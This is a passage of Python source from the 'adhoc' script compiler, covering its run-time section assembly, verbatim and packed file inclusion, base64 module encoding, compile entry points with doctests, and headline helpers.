cls.run_time_section_tag = cls.section_tag(
cls.run_time_section_symbol)
# --------------------------------------------------
# ||:sec:|| Tools
# --------------------------------------------------
@staticmethod
def strquote(source, indent=(' ' * 4)): # |:fnc:|
source = source.replace("'", "\\'")
length = 78 - 2 - 4 - len(indent)
if length < 50:
length = 50
output_parts = []
indx = 0
limit = len(source)
while indx < limit:
output_parts.extend((
indent, " '", source[indx:indx+length], "'\n"))
indx += length
return ''.join(output_parts)
# --------------------------------------------------
# ||:sec:|| Run-Time Section
# --------------------------------------------------
@classmethod
def adhoc_run_time_sections_from_string(cls, string, symbol): # |:clm:|
tag = sformat('(#[ \t\r]*)?{0}', cls.section_tag(symbol, is_re=True))
def_sections = cls.tag_sections(string, tag, is_re=True)
return def_sections
@classmethod
def adhoc_run_time_section_from_file(cls, file_, symbol): # |:clm:|
if file_.endswith('.pyc'):
file_ = file_[:-1]
string = cls.read_source(file_)
def_sections = cls.adhoc_run_time_sections_from_string(
string, symbol)
return def_sections
@classmethod
def adhoc_get_run_time_section( # |:clm:|
cls, symbol, prolog='', epilog=''):
import datetime
adhoc_module_places = []
# try __file__
adhoc_module_places.append(__file__)
def_sections = cls.adhoc_run_time_section_from_file(
__file__, symbol)
if len(def_sections) == 0:
# try adhoc.__file__
try:
import adhoc
adhoc_module_places.append(adhoc.__file__)
def_sections = cls.adhoc_run_time_section_from_file(
adhoc.__file__, symbol)
except:
pass
if len(def_sections) == 0:
# try adhoc.__adhoc__.source
try:
adhoc_module_places.append('adhoc.__adhoc__.source')
def_sections = cls.adhoc_run_time_sections_from_string(
adhoc.__adhoc__.source, symbol)
except:
pass
if len(def_sections) == 0:
adhoc_dump_list(def_sections)
raise AdHocError(sformat('{0} not found in {1}',
cls.section_tag(symbol),
', '.join(adhoc_module_places)))
def_ = ''.join((
sformat('# {0}\n', cls.remove_section_tag),
sformat('# {0}\n', cls.rt_engine_section_tag),
sformat('# -*- coding: utf-8 -*-\n'),
sformat('# {0} {1}\n', cls.compiled_flag,
datetime.datetime.now(),
# |:todo:| add input filename
),
prolog,
''.join(def_sections),
epilog,
sformat('# {0}\n', cls.rt_engine_section_tag),
sformat('# {0}\n', cls.remove_section_tag),
))
return def_
    @classmethod
    def prepare_run_time_section(cls):                     # |:mth:|
        """Assemble the run-time section and rename the run-time class.

        The class definition following the `run_time_class` flag line
        gets :attr:`run_time_class_prefix` prepended to its name.

        :raises AdHocError: if no run-time class flag is found.
        """
        rts = cls.adhoc_get_run_time_section(
            cls.run_time_section_symbol)
        # Split into (is_flag_line, text) pairs on the class flag.
        rtc_sections = cls.tag_split(
            rts, cls.run_time_class_flag)
        transform = []
        done = False
        use_next = False
        for section in rtc_sections:
            blob = section[1]
            if section[0]:
                # Flag line: remember it and apply the rename to the
                # next (non-flag) section.
                use_next = blob
                continue
            if use_next:
                if not done:
                    # Prefix the first class name after the flag, e.g.
                    # 'class AdHoc' -> 'class RtAdHoc'; only done once.
                    mo = re.search('class[ \t\r]+', blob)
                    if mo:
                        blob = (blob[:mo.end(0)]
                                + cls.run_time_class_prefix
                                + blob[mo.end(0):])
                        done = True
                    else:
                        #transform.append(use_next)
                        pass
                use_next = False
            transform.append(blob)
        # Close the engine/remove tag pairs opened by
        # adhoc_get_run_time_section.
        transform.append(sformat('# {0}\n', cls.remove_section_tag))
        transform.append(sformat('# {0}\n', cls.rt_engine_section_tag))
        transform.append(sformat('# {0}\n', cls.rt_engine_section_tag))
        transform.append(sformat('# {0}\n', cls.remove_section_tag))
        rts = ''.join(transform)
        if not done:
            raise AdHocError(
                sformat('run-time class(tag) `{0}` not found in:\n{1}',
                        cls.run_time_class_flag, rts))
        return rts
# --------------------------------------------------
# ||:sec:|| Internal Includer (verbatim)
# --------------------------------------------------
def verbatim_(self, string, name=None): # |:mth:|
'''Entry point for verbatim inclusion.
:returns: string with verbatim included files.
:param string: input string, with |adhoc_verbatim| flags.
:param name: ignored. (API compatibility with
:meth:`AdHoc.compile_`).
.. note:: double commented flags, e.g. ``##``
|adhoc_verbatim|, are ignored.
.. \\|:here:|
>>> section = """\\
... some
... @:""" """adhoc_verbatim:@ {flags} my_verbatim{from_}
... text\\
... """
>>> adhoc = AdHoc()
**Non-existent File**
>>> sv_quiet = AdHoc.quiet
>>> AdHoc.quiet = True
>>> source = adhoc.verbatim_(sformat(section, flags="-2#", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... -2# my_verbatim
text
>>> AdHoc.quiet = sv_quiet
**Empty File**
>>> source = adhoc.verbatim_(sformat(section, flags="", from_=" from /dev/null"))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... my_verbatim from /dev/null
# @:adhoc_remove...
# @:adhoc_indent... -4
# @:adhoc_template_v... my_verbatim
# @:adhoc_template_v...
# @:adhoc_indent...
# @:adhoc_remove...
text
**Empty file, with negative indent, commented**
>>> source = adhoc.verbatim_(sformat(section, flags="-2#", from_=" from /dev/null"))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... -2# my_verbatim from /dev/null
# @:adhoc_remove...
# @:adhoc_uncomment...
# @:adhoc_indent... -2
# @:adhoc_template_v... my_verbatim
# @:adhoc_template_v...
# @:adhoc_indent...
# @:adhoc_uncomment...
# @:adhoc_remove...
text
**Empty file, with overflowing negative indent, commented**
>>> source = adhoc.verbatim_(sformat(section, flags="-8#", from_=" from /dev/null"))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... -8# my_verbatim from /dev/null
# @:adhoc_remove...
# @:adhoc_uncomment...
# @:adhoc_template_v... my_verbatim
# @:adhoc_template_v...
# @:adhoc_uncomment...
# @:adhoc_remove...
text
**Existing file, without newline at end of file, commented.**
>>> mvf = open("my_verbatim", "w")
>>> ign = mvf.write("no end of line")
>>> mvf.close()
>>> source = adhoc.verbatim_(sformat(section, flags="-4#", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... -4# my_verbatim
# @:adhoc_remove...
# @:adhoc_uncomment...
# @:adhoc_template_v... my_verbatim
# no end of line
# @:adhoc_template_v...
# @:adhoc_uncomment...
# @:adhoc_remove...
text
**Existing file, with extra newline at end of file, commented.**
>>> mvf = open("my_verbatim", "w")
>>> ign = mvf.write("extra end of line\\n\\n")
>>> mvf.close()
>>> source = adhoc.verbatim_(sformat(section, flags="-4#", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... -4# my_verbatim
# @:adhoc_remove...
# @:adhoc_uncomment...
# @:adhoc_template_v... my_verbatim
# extra end of line
<BLANKLINE>
# @:adhoc_template_v...
# @:adhoc_uncomment...
# @:adhoc_remove...
text
**Existing file, without newline at end of file, not commented.**
>>> mvf = open("my_verbatim", "w")
>>> ign = mvf.write("no end of line")
>>> mvf.close()
>>> source = adhoc.verbatim_(sformat(section, flags="-4", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... -4 my_verbatim
# @:adhoc_remove...
# @:adhoc_template_v... my_verbatim
no end of line
# @:adhoc_template_v...
# @:adhoc_remove...
text
**Existing file, with extra newline at end of file, not commented.**
>>> mvf = open("my_verbatim", "w")
>>> ign = mvf.write("extra end of line\\n\\n")
>>> mvf.close()
>>> source = adhoc.verbatim_(sformat(section, flags="", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... my_verbatim
# @:adhoc_remove...
# @:adhoc_indent:@ -4
# @:adhoc_template_v... my_verbatim
extra end of line
<BLANKLINE>
# @:adhoc_template_v...
# @:adhoc_indent:@
# @:adhoc_remove...
text
**Existing file, but override with source /dev/null.**
>>> source = adhoc.verbatim_(sformat(section, flags="/dev/null as", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... /dev/null as my_verbatim
# @:adhoc_remove...
# @:adhoc_indent... -4
# @:adhoc_template_v... my_verbatim
# @:adhoc_template_v...
# @:adhoc_indent...
# @:adhoc_remove...
text
**Existing file, override with non-existing source /not-here/.**
>>> if os.path.exists("not-here"):
... os.unlink("not-here")
>>> source = adhoc.verbatim_(sformat(section, flags="not-here as", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... not-here as my_verbatim
# @:adhoc_remove...
# @:adhoc_indent... -4
# @:adhoc_template_v... my_verbatim
extra end of line
<BLANKLINE>
# @:adhoc_template_v...
# @:adhoc_indent...
# @:adhoc_remove...
text
>>> os.unlink("my_verbatim")
'''
m = 'is: '
import datetime
# # check for @: adhoc_compiled :@
# adhoc_compiled_lines = self.tag_lines(
# string, self.line_tag('adhoc_compiled'))
# if len(adhoc_compiled_lines) > 0:
# sys.stderr.write(sformat(
# '{0}{1}' 'warning: {2} already AdHoc\'ed `{3}`\n',
# dbg_comm, m, name, adhoc_compiled_lines[0].rstrip()))
# return string
# handle @: adhoc_verbatim :@
result = []
verbatim_cmd_parts = self.tag_split(string, self.verbatim_flag)
for part in verbatim_cmd_parts:
verbatim_def = part[1]
result.append(verbatim_def)
if part[0]:
# skip commented verbatim includes
if re.match('\\s*#\\s*#', verbatim_def):
if self.verbose:
printe(sformat(
'{0}{1}Skipping disabled verbatim `{2}`',
dbg_comm, m, verbatim_def.rstrip()))
continue
indent = ''
mo = re.match('\\s*', verbatim_def)
if mo:
indent = mo.group(0)
verbatim_def = self.line_tag_strip(
verbatim_def, self.verbatim_flag_symbol)
verbatim_specs = []
for verbatim_spec in re.split('\\s*,\\s*', verbatim_def):
verbatim_spec1 = re.split('\\s+from\\s+', verbatim_spec)
verbatim_spec2 = re.split('\\s+as\\s+', verbatim_spec)
default = None
source = None
output = None
flags = None
if len(verbatim_spec1) > 1:
output = verbatim_spec1[0]
default = verbatim_spec1[1]
fields = re.split('\\s+', output, 1)
if len(fields) > 1:
flags = fields[0]
output = fields[1]
else:
flags = ''
source = output
if len(verbatim_spec2) > 1:
source = verbatim_spec2[0]
output = verbatim_spec2[1]
fields = re.split('\\s+', source, 1)
if len(fields) > 1:
flags = fields[0]
source = fields[1]
else:
flags = ''
default = output
if flags is None:
source = verbatim_spec
fields = re.split('\\s+', source, 1)
if len(fields) > 1:
flags = fields[0]
source = fields[1]
else:
flags = ''
source = fields[0]
default = source
output = source
verbatim_specs.append([flags, source, default, output])
for verbatim_spec in verbatim_specs:
vflags = verbatim_spec.pop(0)
ifile = verbatim_spec.pop()
found = False
for lfile in verbatim_spec:
lfile = os.path.expanduser(lfile)
blfile = lfile
for include_dir in self.include_path:
if not os.path.exists(lfile):
if not (os.path.isabs(blfile)):
lfile = os.path.join(include_dir, blfile)
continue
break
if os.path.exists(lfile):
stat = os.stat(lfile)
mtime = datetime.datetime.fromtimestamp(
stat.st_mtime)
mode = stat.st_mode
exp_source = self.read_source(lfile)
source_len = len(exp_source)
start_tags = []
end_tags = []
prefix = []
tag_prefix = ['# ']
mo = re.search('[-+]?[0-9]+', vflags)
if mo:
uindent = int(mo.group(0))
else:
uindent = 0
tindent = (len(indent) + uindent)
if tindent < 0:
tindent = 0
if tindent:
tag = self.indent_section_tag
start_tags.insert(
0, ''.join((tag, ' ', str(-tindent))))
end_tags.append(tag)
prefix.insert(0, ' ' * tindent)
tag_prefix.insert(0, ' ' * tindent)
if '#' in vflags:
tag = self.uncomment_section_tag
start_tags.insert(0, tag)
end_tags.append(tag)
exp_source, hl = self.disable_transform(exp_source)
tag = self.remove_section_tag
start_tags.insert(0, tag)
end_tags.append(tag)
tag = self.section_tag('adhoc_template_v')
start_tags.append(''.join((tag, ' ', ifile)))
end_tags.insert(0,tag)
prefix = ''.join(prefix)
tag_prefix = ''.join(tag_prefix)
if prefix and exp_source:
if exp_source.endswith('\n'):
exp_source = exp_source[:-1]
exp_source = re.sub('^(?m)', prefix, exp_source)
if exp_source and not exp_source.endswith('\n'):
exp_source = ''.join((exp_source, '\n'))
output = []
output.extend([''.join((
tag_prefix, tag, '\n')) for tag in start_tags])
output.append(exp_source)
output.extend([''.join((
tag_prefix, tag, '\n')) for tag in end_tags])
result.append(''.join(output))
found = True
# |:debug:|
if self.verbose:
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]len: {5:>6d}"
" exp: {6:>6d} ]{9}[",
dbg_comm, dbg_twid, dbg_fwid, ':INF:',
'source stats', source_len, len(exp_source),
0, 0, ifile))
# |:debug:|
break
if not found and not self.quiet:
list(map(sys.stderr.write,
("# if: ", self.__class__.__name__,
": warning verbatim file `", ifile,
"` not found from `",
', '.join(verbatim_spec), "`\n")))
#adhoc_dump_list(result)
return ''.join(result)
# --------------------------------------------------
# ||:sec:|| Internal Includer (packed)
# --------------------------------------------------
def include_(self, string, name=None, zipped=True, flat=None): # |:mth:|
    '''Entry point for inclusion.
    :returns: string with packed included files.
    :param string: input string, with |adhoc_include| flags.
    :param name: ignored. (API compatibility with
    :meth:`AdHoc.compile_`).
    :param zipped: if True, :mod:`gzip` included files.
    .. note:: double commented flags, e.g. ``##``
    |adhoc_include|, are ignored.
    .. \\|:here:|
    >>> section = """\\
    ... some
    ... @:""" """adhoc_include:@ Makefile
    ... text\\
    ... """
    .. @:adhoc_disable:@
    >>> adhoc = AdHoc()
    >>> source = adhoc.include_(section)
    >>> printf(source) #doctest: +ELLIPSIS
    some
    @:adhoc_include... Makefile
    # @:adhoc_unpack...
    RtAdHoc.unpack_(None, file_='Makefile',
    mtime='...', mode=...,
    zipped=True, flat=None, source64=
    ...
    # @:adhoc_unpack...
    text
    .. @:adhoc_disable:@
    '''
    # message prefix for diagnostics
    m = 'is: '
    import datetime
    # # check for @: adhoc_compiled :@
    # adhoc_compiled_lines = self.tag_lines(
    #     string, self.line_tag('adhoc_compiled'))
    # if len(adhoc_compiled_lines) > 0:
    #     sys.stderr.write(sformat(
    #         '{0}{1}' 'warning: {2} already AdHoc\'ed `{3}`\n',
    #         dbg_comm, m, name, adhoc_compiled_lines[0].rstrip()))
    #     return string
    # handle @: adhoc_include :@
    result = []
    # tag_split yields (tagged?, text) pairs; untagged text is copied
    # through unchanged, tagged lines are followed by generated output
    include_cmd_sections = self.tag_split(string, self.include_flag)
    for section in include_cmd_sections:
        include_def = section[1]
        # the tagged line itself is preserved in the output
        result.append(include_def)
        if section[0]:
            # skip commented includes (double comment marker '# #')
            if re.match('\\s*#\\s*#', include_def):
                if self.verbose:
                    printe(sformat(
                        '{0}{1}Skipping disabled include `{2}`',
                        dbg_comm, m, include_def.rstrip()))
                continue
            # remember leading whitespace of the tagged line; the
            # generated unpack section is indented to match
            indent = ''
            mo = re.match('\\s*', include_def)
            if mo:
                indent = mo.group(0)
            include_def = self.line_tag_strip(
                include_def, self.include_flag_symbol)
            # parse comma-separated specs; each spec is one of
            #   `output from default` | `source as output` | `source`
            include_specs = []
            for include_spec in re.split('\\s*,\\s*', include_def):
                include_spec1 = re.split('\\s+from\\s+', include_spec)
                include_spec2 = re.split('\\s+as\\s+', include_spec)
                default = None
                source = None
                output = None
                if len(include_spec1) > 1:
                    output = include_spec1[0]
                    default = include_spec1[1]
                    source = output
                if len(include_spec2) > 1:
                    source = include_spec2[0]
                    output = include_spec2[1]
                    default = output
                if source is None:
                    source = include_spec
                    output = source
                    default = source
                include_specs.append([source, default, output])
            for include_spec in include_specs:
                # last element is the output (archive member) name;
                # the remaining candidates are searched for on disk
                ifile = include_spec.pop()
                found = False
                for lfile in include_spec:
                    lfile = os.path.expanduser(lfile)
                    blfile = lfile
                    # probe the include path for a relative candidate
                    for include_dir in self.include_path:
                        if not os.path.exists(lfile):
                            if not (os.path.isabs(blfile)):
                                lfile = os.path.join(include_dir, blfile)
                            continue
                        break
                    if os.path.exists(lfile):
                        # record mtime/mode so unpack_ can restore them
                        stat = os.stat(lfile)
                        mtime = datetime.datetime.fromtimestamp(
                            stat.st_mtime)
                        mode = stat.st_mode
                        # raw bytes; packed (optionally gzipped) base64
                        exp_source = self.read_source(lfile, decode=False)
                        source64 = self.pack_file(exp_source, zipped)
                        output = self.strquote(source64, indent)
                        # arguments for file_include_template
                        file_include_args = dict([ # |:api_fi:|
                            ('ind', indent),
                            ('ina', ''.join((indent, " "))),
                            ('stg', ''.join((self.unpack_section_tag, ' !', ifile))),
                            ('etg', self.unpack_section_tag),
                            ('rtp', self.run_time_class_prefix),
                            ('ahc', 'AdHoc.unpack_'),
                            ('mod', 'None'),
                            ('fnm', repr(str(ifile))),
                            ('mtm', (((mtime is not None)
                                      and repr(mtime.isoformat()))
                                     or repr(mtime))),
                            ('fmd', (mode is not None and sformat('int("{0:o}", 8)', mode)) or mode),
                            ('zip', zipped),
                            ('flt', flat),
                            ('src', output.rstrip()),
                            ])
                        output = sformat(
                            self.file_include_template,
                            **file_include_args
                            )
                        result.append(output)
                        found = True
                        # |:debug:|
                        if self.verbose:
                            source_len = len(exp_source)
                            exp_source_len = len(exp_source)
                            source64_len = len(source64)
                            printe(sformat(
                                "{0}{3:^{1}} {4:<{2}s}: ]len: {5:>6d}"
                                " exp: {6:>6d} b64: {8:>6d}[ ]{9}[",
                                dbg_comm, dbg_twid, dbg_fwid, ':INF:',
                                'source stats', source_len, exp_source_len,
                                0, source64_len, ifile))
                        # |:debug:|
                        break
                if not found and not self.quiet:
                    list(map(sys.stderr.write,
                             ("# if: ", self.__class__.__name__,
                              ": warning include file `",
                              ifile, "` not found from `",
                              ', '.join(include_spec), "`\n")))
    #adhoc_dump_list(result)
    return ''.join(result)
# --------------------------------------------------
# ||:sec:|| Internal Compiler
# --------------------------------------------------
def encode_module_( # |:mth:|
        self, module, for_=None, indent='', zipped=True, flat=None, forced=None):
    """Compile `module` (and its parent packages) into packed import sections.

    :returns: string with the generated import section(s); '' when the
        module was already processed.
    :param module: module object or module name (resolved via
        :meth:`module_setup`).
    :param for_: RtAdHoc method name used in the generated call
        (defaults to ``self.import_function``).
    :param indent: leading whitespace for the generated section.
    :param zipped: if True, :mod:`gzip` the packed source.
    :param flat: if True, do not recurse into submodules.
    :param forced: re-encode even if already seen (defaults to
        ``self.forced``).
    """
    m = 'gm: '
    if for_ is None:
        for_ = self.import_function
    if forced is None:
        forced = self.forced
    module = self.module_setup(module)
    module_name = module.__name__
    # no multiple occurrences
    if (not forced
        and (module_name in self.modules
             or module_name in self.compiling)):
        if self.verbose:
            # |:check:| what, if the previous import was never
            # executed?
            sys.stderr.write(sformat(
                '{0}{1}`{2}` already seen. skipping ...\n',
                dbg_comm, m, module_name))
        return ''
    self.compiling.append(module_name)
    result = []
    # |:todo:| parent modules
    # encode parent packages first so the import machinery can set
    # them up before the submodule is unpacked
    parts = module_name.split('.')
    parent_modules = parts[:-1]
    if self.verbose and len(parent_modules) > 0:
        sys.stderr.write(sformat(
            '{0}{1}Handle parent module(s) `{2}`\n',
            dbg_comm, m, parent_modules))
    for parent_module in parent_modules:
        result.append(self.encode_module_(
            parent_module, for_, indent, zipped, flat, forced))
    if (module_name in self.modules):
        if self.verbose:
            # bug fix: the format string used `{1}` twice and never
            # referenced `{2}`, so the module name was never shown
            sys.stderr.write(sformat(
                '{0}{1}`{2}` already seen after parent import\n',
                dbg_comm, m, module_name))
        return ''.join(result)
    if hasattr(module, '__file__'):
        module_file = module.__file__
        if module_file.endswith('.pyc'):
            module_file = module_file[:-1]
    else:
        module_file = None
    if hasattr(module.__adhoc__, 'source'):
        source = module.__adhoc__.source
    else:
        if not self.quiet:
            printf(sformat(
                '{0}{1}|' 'warning: `{2}` does not have any source code.',
                dbg_comm, m, module_name), file=sys.stderr)
        # nothing to pack; emit only what was collected for parents
        return ''.join(result)
    # recursive!
    exp_source = self.compile_(source, module_file, for_, zipped, forced)
    source64 = self.pack_file(exp_source, zipped)
    output = self.strquote(source64, indent)
    mtime = module.__adhoc__.mtime
    mode = module.__adhoc__.mode
    # |:todo:| make Rt prefix configurable
    # arguments for file_include_template
    file_include_args = dict([ # |:api_fi:|
        ('ind', indent),
        ('ina', ''.join((indent, " "))),
        ('stg', ''.join((self.import_section_tag, ' !', module_name))),
        ('etg', self.import_section_tag),
        ('rtp', self.run_time_class_prefix),
        ('ahc', for_),
        ('mod', repr(module.__name__)),
        ('fnm', (((module_file is not None)
                  and repr(str(os.path.relpath(module_file))))
                 or module_file)),
        ('mtm', (((mtime is not None)
                  and repr(mtime.isoformat()))
                 or repr(mtime))),
        ('fmd', (mode is not None and sformat('int("{0:o}", 8)', mode)) or mode),
        ('zip', zipped),
        ('src', output.rstrip()),
        ('flt', flat),
        ])
    output = sformat(
        self.file_include_template,
        **file_include_args
        )
    result.append(output)
    # |:debug:|
    if self.verbose:
        source_len = len(source)
        exp_source_len = len(exp_source)
        source64_len = len(source64)
        printe(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]len: {5:>6d} exp: {6:>6d}"
            " b64: {8:>6d}[ ]{9}[",
            dbg_comm, dbg_twid, dbg_fwid, ':INF:',
            'source stats', source_len, exp_source_len, 0,
            source64_len, module_file))
    # |:debug:|
    return ''.join(result)
def compile_(self, string, name=None, for_=None, # |:mth:|
             zipped=True, forced=None):
    '''Entry point for compilation.
    :returns: string with fully compiled adhoc source. Includes
    run-time class, imports, packed includes, verbatim includes,
    enabled/disabled sections.
    :param string: input string, with |adhoc| flags.
    :param name: for messages.
    :param for_: :class:`RtAdHoc` method call.
    :param zipped: if True, :mod:`gzip` included files.
    .. note:: for |adhoc|, commented lines, e.g.
    ``# import module # @:``\\ ``adhoc:@``, are ignored.
    .. \\|:here:|
    '''
    # message prefix for diagnostics
    m = 'cs: '
    if name is None:
        name = repr(string[:50])
    # check for @: adhoc_compiled :@
    # a file that already carries the compiled marker is passed
    # through unchanged (after macro expansion)
    string = self.expand_macros(string)
    adhoc_compiled_lines = self.tag_lines(
        string, self.line_tag('adhoc_compiled'))
    if len(adhoc_compiled_lines) > 0:
        if not self.quiet:
            list(map(sys.stderr.write,
                     ('# ', m, 'warning: ', name, ' already AdHoc\'ed `',
                      adhoc_compiled_lines[0].rstrip(), '`\n',)))
        return string
    # check for @: adhoc_self :@ (should not be taken from any templates)
    # modules named here are treated as "already being compiled"
    adhoc_self_tag = self.line_tag('adhoc_self')
    adhoc_self_lines = self.tag_lines(
        string, adhoc_self_tag)
    if len(adhoc_self_lines) > 0:
        for line in adhoc_self_lines:
            line = re.sub(''.join(('^.*', adhoc_self_tag)), '', line)
            line = line.strip()
            selfs = line.split()
            if self.verbose:
                printe(sformat(
                    '{0}{1}|' ':INF:| {2} found self: `{3}`',
                    dbg_comm, m, name, ', '.join(selfs)))
            self.compiling.extend(selfs)
    # check for @: adhoc_remove :@
    # renamed now, restored as `adhoc_remove` in the compiled output
    string = self.section_tag_rename(string, 'adhoc_remove', 'adhoc_remove_')
    # check for @: adhoc_verbatim :@ (templates can define the run-time flag, includes, imports)
    string = self.verbatim_(string, name)
    # search for @: adhoc_run_time :@ and put run-time section there!
    result = []
    ah_run_time_sections = self.tag_split(
        string, self.line_tag(self.run_time_flag_symbol))
    good = False
    for section in ah_run_time_sections:
        config_def = section[1]
        # only the first (non-double-commented) tag receives the
        # run-time section
        if not good and section[0]:
            # ignore double commented tagged lines
            if not re.match('\\s*#\\s*#', config_def):
                config_def = sformat('{0}{1}',
                                     config_def, self.run_time_section)
                good = True
        result.append(config_def)
    string = ''.join(result)
    # check for @: adhoc_include :@
    string = self.include_(string, name, zipped)
    # handle @: adhoc :@ imports
    result = []
    import_cmd_sections = self.tag_split(string, self.import_flag)
    # imports require the run-time class; fail early if it was never
    # placed
    if not good and len(import_cmd_sections) > 1:
        adhoc_dump_sections(import_cmd_sections)
        raise AdHocError(sformat('{0} not found',
                                 self.line_tag(self.run_time_flag_symbol)))
    for section in import_cmd_sections:
        import_def = section[1]
        if section[0]:
            # skip commented imports
            if re.match('\\s*#', import_def):
                if self.verbose:
                    printe(sformat(
                        '{0}{1}Skipping disabled `{2}`',
                        dbg_comm, m, import_def.rstrip()))
                result.append(import_def)
                continue
            # tag arguments (e.g. `flat`, `full`, `force`) modify how
            # the module is encoded
            import_args = self.line_tag_strip(import_def, self.import_flag_symbol)
            module = ''
            # accept `from MOD import ...` as well as `import MOD`
            mo = re.match(
                '(\\s*)from\\s+([a-zA-Z_][.0-9a-zA-Z_]*)\\s+'
                'import', import_def)
            if mo:
                indent = mo.group(1)
                module = mo.group(2)
            else:
                mo = re.match(
                    '([ \t\r]*)import[ \t\r]+([a-zA-Z_][.0-9a-zA-Z_]*)',
                    import_def)
                if mo:
                    indent = mo.group(1)
                    module = mo.group(2)
            if len(module) > 0:
                module_flat = ((('flat' in import_args.lower().split()) and (True)) or (None))
                module_flat = ((('full' in import_args.lower().split()) and (False)) or (module_flat))
                module_forced = ((('force' in import_args.lower().split()) and (True)) or (forced))
                # prepend the packed module source to the import line
                source = self.encode_module_(module, for_, indent, zipped, module_flat, module_forced)
                import_def = sformat('{0}{1}',source, import_def)
            else:
                if self.verbose:
                    list(map(sys.stderr.write,
                             ('# ', m, 'warning: no import found! `',
                              import_def.rstrip(), '`\n')))
        result.append(import_def)
    string = ''.join(result)
    # These are last, to avoid enabling/disabling the wrong imports etc.
    # check for @: adhoc_enable :@
    string = self.enable_sections(string, 'adhoc_enable')
    # check for @: adhoc_disable :@
    string = self.disable_sections(string, 'adhoc_disable')
    #adhoc_dump_list(result)
    return string
# --------------------------------------------------
# ||:sec:|| User API
# --------------------------------------------------
def encode_include( # |:mth:|
        self, file_, as_=None, indent='', zipped=True):
    # NOTE(review): body looks truncated/vestigial -- `m` is assigned but
    # never used and the method implicitly returns None; confirm against
    # upstream before relying on this entry point.
    m = 'if: '
def encode_module( # |:mth:|
        self, module, for_=None, indent='', zipped=True, flat=None, forced=None):
    """Verbose wrapper around :meth:`encode_module_`.

    :returns: result of :meth:`encode_module_`.
    :param module: module object or module name string; all other
        parameters are forwarded unchanged.
    """
    # bug fix: hasattr() takes an attribute *name* string; the original
    # passed the value of the surrounding module's __name__ (i.e.
    # checked for an attribute called e.g. 'adhoc') instead of the
    # literal '__name__'.
    if hasattr(module, '__name__'):
        name = module.__name__
    else:
        name = module
    if self.verbose:
        sys.stderr.write(sformat(
            '{0}--------------------------------------------------\n',
            dbg_comm))
        sys.stderr.write(sformat(
            '{0}Get module `{1}`\n',
            dbg_comm, name))
        sys.stderr.write(sformat(
            '{0}--------------------------------------------------\n',
            dbg_comm))
    return self.encode_module_(module, for_, indent, zipped, flat, forced)
def compile(self, string, name=None, for_=None, # |:mth:|
            zipped=True, forced=None):
    '''Compile a string into adhoc output.

    Verbose wrapper around :meth:`compile_`; all parameters are
    forwarded unchanged.
    '''
    if self.verbose:
        if name is None:
            name = repr(string[:50])
        rule = sformat(
            '{0}--------------------------------------------------\n',
            dbg_comm)
        sys.stderr.write(rule)
        sys.stderr.write(sformat(
            '{0}Compiling string `{1}`\n',
            dbg_comm, name))
        sys.stderr.write(rule)
    return self.compile_(string, name, for_, zipped, forced)
# @:adhoc_run_time_section:@ on
def compileFile(self, file_name, for_=None, zipped=True, forced=None): # |:mth:|
    # @:adhoc_run_time_section:@ off
    """Compile a file into adhoc output.

    Since a module that has RtAdHoc defined is already adhoc'ed,
    the run-time RtAdHoc method returns the file source as is.

    :param file_name: name of the file to compile.
    :param for_: :class:`RtAdHoc` method call (forwarded to compile_).
    :param zipped: if True, :mod:`gzip` included files.
    :param forced: force re-inclusion of already seen modules.

    .. note:: the ``@:adhoc_run_time_section:@`` marker comments select
       which lines become part of the generated run-time class; keep
       them exactly as they are.
    """
    # @:adhoc_run_time_section:@ on
    # @:adhoc_run_time_section:@ off
    if self.verbose:
        sys.stderr.write(sformat(
            '{0}--------------------------------------------------\n',
            dbg_comm))
        sys.stderr.write(
            sformat('{0}Compiling {1}\n',dbg_comm, file_name))
        sys.stderr.write(sformat(
            '{0}--------------------------------------------------\n',
            dbg_comm))
    # @:adhoc_run_time_section:@ on
    file_name, source = self.std_source_param(file_name, None)
    # @:adhoc_run_time_section:@ off
    source = self.compile_(source, file_name, for_, zipped, forced)
    # @:adhoc_run_time_section:@ on
    return source
    # @:adhoc_run_time_section:@ END
# (progn (forward-line -1) (insert "\n") (snip-insert-mode "py.s.class" t) (backward-symbol-tag 2 "fillme" "::"))
# --------------------------------------------------
# |||:sec:||| FUNCTIONS
# --------------------------------------------------
# (progn (forward-line 1) (snip-insert-mode "py.f.hl" t) (insert "\n"))
# current headline renderer; rebound by hl_lvl()
hlr = None

def hlcr(title=None, tag='|||' ':CHP:|||', rule_width=50, **kwargs): # ||:fnc:||
    """Return a chapter headline (rule / optional title / rule) as a string."""
    comm = globals().get('dbg_comm') or '# '
    rule = ''.join((comm, '-' * rule_width))
    lines = [rule]
    if title:
        twid = globals().get('dbg_twid') or 9
        lines.append(sformat('{0}{2:^{1}} {3!s}', comm, twid, tag, title))
    lines.append(rule)
    return '\n'.join(lines)

def hlsr(title=None, tag='||' ':SEC:||', rule_width=35, **kwargs): # |:fnc:|
    """Return a section headline as a string."""
    return hlcr(title, tag, rule_width)

def hlssr(title=None, tag='|' ':INF:|', rule_width=20, **kwargs): # |:fnc:|
    """Return a sub-section headline as a string."""
    return hlcr(title, tag, rule_width)

def hlc(*args, **kwargs): # |:fnc:|
    """Print a chapter headline."""
    for headline_part in hlcr(*args, **kwargs).splitlines():
        printf(headline_part, **kwargs)

def hls(*args, **kwargs): # |:fnc:|
    """Print a section headline."""
    for headline_part in hlsr(*args, **kwargs).splitlines():
        printf(headline_part, **kwargs)

def hlss(*args, **kwargs): # |:fnc:|
    """Print a sub-section headline."""
    for headline_part in hlssr(*args, **kwargs).splitlines():
        printf(headline_part, **kwargs)

def hl(*args, **kwargs): # |:fnc:|
    """Print a headline using the renderer selected by hl_lvl()."""
    for headline_part in hlr(*args, **kwargs).splitlines():
        printf(headline_part, **kwargs)

